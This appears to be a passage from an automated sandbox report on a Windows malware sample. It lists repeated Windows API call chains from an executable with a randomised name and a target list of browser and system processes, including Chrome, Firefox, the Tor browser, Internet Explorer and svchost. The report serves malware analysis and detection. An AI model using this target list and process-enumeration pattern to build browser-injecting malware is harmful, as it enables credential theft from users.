IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	7_2_03115890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	7_2_03115890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	7_2_03115890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	7_2_03115890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	7_2_03103510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	7_2_03103510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	7_2_03103510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	10_2_01535890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	10_2_01535890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	10_2_01535890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	10_2_01535890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	10_2_01535890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	10_2_01535890
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	10_2_01536370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	10_2_01536370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	10_2_01536370
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	10_2_01523510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	10_2_01523510
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	10_2_01523510

Source: C:\Windows\apppatch\svchost.exe

